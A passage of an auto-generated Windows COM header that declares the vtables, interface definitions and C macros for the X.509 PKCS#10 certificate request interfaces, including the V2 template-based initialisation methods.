            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Signature )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetCspStatuses )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ X509KeySpec KeySpec,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppCspStatuses);
        
        END_INTERFACE
    } IX509CertificateRequestPkcs10Vtbl;

    interface IX509CertificateRequestPkcs10
    {
        CONST_VTBL struct IX509CertificateRequestPkcs10Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRequestPkcs10_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRequestPkcs10_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRequestPkcs10_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRequestPkcs10_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRequestPkcs10_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRequestPkcs10_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRequestPkcs10_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRequestPkcs10_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509CertificateRequestPkcs10_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRequestPkcs10_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRequestPkcs10_GetInnerRequest(This,Level,ppValue)	\
    ( (This)->lpVtbl -> GetInnerRequest(This,Level,ppValue) ) 

#define IX509CertificateRequestPkcs10_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IX509CertificateRequestPkcs10_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509CertificateRequestPkcs10_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509CertificateRequestPkcs10_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509CertificateRequestPkcs10_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509CertificateRequestPkcs10_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509CertificateRequestPkcs10_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509CertificateRequestPkcs10_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509CertificateRequestPkcs10_get_SuppressDefaults(This,pValue)	\
    ( (This)->lpVtbl -> get_SuppressDefaults(This,pValue) ) 

#define IX509CertificateRequestPkcs10_put_SuppressDefaults(This,Value)	\
    ( (This)->lpVtbl -> put_SuppressDefaults(This,Value) ) 

#define IX509CertificateRequestPkcs10_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10_put_RenewalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_RenewalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestPkcs10_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509CertificateRequestPkcs10_put_ClientId(This,Value)	\
    ( (This)->lpVtbl -> put_ClientId(This,Value) ) 

#define IX509CertificateRequestPkcs10_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509CertificateRequestPkcs10_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs10_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs10_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509CertificateRequestPkcs10_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509CertificateRequestPkcs10_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509CertificateRequestPkcs10_InitializeFromPrivateKey(This,Context,pPrivateKey,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromPrivateKey(This,Context,pPrivateKey,strTemplateName) ) 

#define IX509CertificateRequestPkcs10_InitializeFromPublicKey(This,Context,pPublicKey,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromPublicKey(This,Context,pPublicKey,strTemplateName) ) 

#define IX509CertificateRequestPkcs10_InitializeFromCertificate(This,Context,strCertificate,Encoding,InheritOptions)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,Context,strCertificate,Encoding,InheritOptions) ) 

#define IX509CertificateRequestPkcs10_InitializeDecode(This,strEncodedData,Encoding)	\
    ( (This)->lpVtbl -> InitializeDecode(This,strEncodedData,Encoding) ) 

#define IX509CertificateRequestPkcs10_CheckSignature(This,AllowedSignatureTypes)	\
    ( (This)->lpVtbl -> CheckSignature(This,AllowedSignatureTypes) ) 

#define IX509CertificateRequestPkcs10_IsSmartCard(This,pValue)	\
    ( (This)->lpVtbl -> IsSmartCard(This,pValue) ) 

#define IX509CertificateRequestPkcs10_get_TemplateObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_TemplateObjectId(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_get_PublicKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PublicKey(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_get_PrivateKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PrivateKey(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_get_NullSigned(This,pValue)	\
    ( (This)->lpVtbl -> get_NullSigned(This,pValue) ) 

#define IX509CertificateRequestPkcs10_get_ReuseKey(This,pValue)	\
    ( (This)->lpVtbl -> get_ReuseKey(This,pValue) ) 

#define IX509CertificateRequestPkcs10_get_OldCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_OldCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10_get_Subject(This,ppValue)	\
    ( (This)->lpVtbl -> get_Subject(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_put_Subject(This,pValue)	\
    ( (This)->lpVtbl -> put_Subject(This,pValue) ) 

#define IX509CertificateRequestPkcs10_get_CspStatuses(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspStatuses(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_get_SmimeCapabilities(This,pValue)	\
    ( (This)->lpVtbl -> get_SmimeCapabilities(This,pValue) ) 

#define IX509CertificateRequestPkcs10_put_SmimeCapabilities(This,Value)	\
    ( (This)->lpVtbl -> put_SmimeCapabilities(This,Value) ) 

#define IX509CertificateRequestPkcs10_get_SignatureInformation(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignatureInformation(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_get_KeyContainerNamePrefix(This,pValue)	\
    ( (This)->lpVtbl -> get_KeyContainerNamePrefix(This,pValue) ) 

#define IX509CertificateRequestPkcs10_put_KeyContainerNamePrefix(This,Value)	\
    ( (This)->lpVtbl -> put_KeyContainerNamePrefix(This,Value) ) 

#define IX509CertificateRequestPkcs10_get_CryptAttributes(This,ppValue)	\
    ( (This)->lpVtbl -> get_CryptAttributes(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_get_X509Extensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509Extensions(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_get_CriticalExtensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_CriticalExtensions(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_get_SuppressOids(This,ppValue)	\
    ( (This)->lpVtbl -> get_SuppressOids(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_get_RawDataToBeSigned(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawDataToBeSigned(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10_get_Signature(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Signature(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10_GetCspStatuses(This,KeySpec,ppCspStatuses)	\
    ( (This)->lpVtbl -> GetCspStatuses(This,KeySpec,ppCspStatuses) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRequestPkcs10_INTERFACE_DEFINED__ */


#ifndef __IX509CertificateRequestPkcs10V2_INTERFACE_DEFINED__
#define __IX509CertificateRequestPkcs10V2_INTERFACE_DEFINED__

/* interface IX509CertificateRequestPkcs10V2 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRequestPkcs10V2;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab35b-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRequestPkcs10V2 : public IX509CertificateRequestPkcs10
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromTemplate( 
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromPrivateKeyTemplate( 
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromPublicKeyTemplate( 
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PolicyServer( 
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Template( 
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509CertificateRequestPkcs10V2Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetInnerRequest )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out X509RequestType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClientId )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ RequestClientInfoClientId Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromPrivateKey )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPublicKey )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        HRESULT ( STDMETHODCALLTYPE *CheckSignature )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [defaultvalue][in] */ Pkcs10AllowedSignatureTypes AllowedSignatureTypes);
        
        HRESULT ( STDMETHODCALLTYPE *IsSmartCard )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TemplateObjectId )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PublicKey )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PublicKey **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_PrivateKey )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PrivateKey **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NullSigned )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ReuseKey )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_OldCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Subject )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX500DistinguishedName **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Subject )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ __RPC__in_opt IX500DistinguishedName *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspStatuses )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SmimeCapabilities )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_SmimeCapabilities )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignatureInformation )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyContainerNamePrefix )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyContainerNamePrefix )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CryptAttributes )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttributes **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509Extensions )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CriticalExtensions )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressOids )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawDataToBeSigned )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Signature )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetCspStatuses )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ X509KeySpec KeySpec,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppCspStatuses);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplate )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPrivateKeyTemplate )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPublicKeyTemplate )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PolicyServer )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Template )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate);
        
        END_INTERFACE
    } IX509CertificateRequestPkcs10V2Vtbl;

    interface IX509CertificateRequestPkcs10V2
    {
        CONST_VTBL struct IX509CertificateRequestPkcs10V2Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRequestPkcs10V2_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRequestPkcs10V2_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRequestPkcs10V2_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRequestPkcs10V2_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRequestPkcs10V2_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRequestPkcs10V2_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRequestPkcs10V2_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRequestPkcs10V2_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509CertificateRequestPkcs10V2_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRequestPkcs10V2_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRequestPkcs10V2_GetInnerRequest(This,Level,ppValue)	\
    ( (This)->lpVtbl -> GetInnerRequest(This,Level,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_put_Silent(This,Value)	\
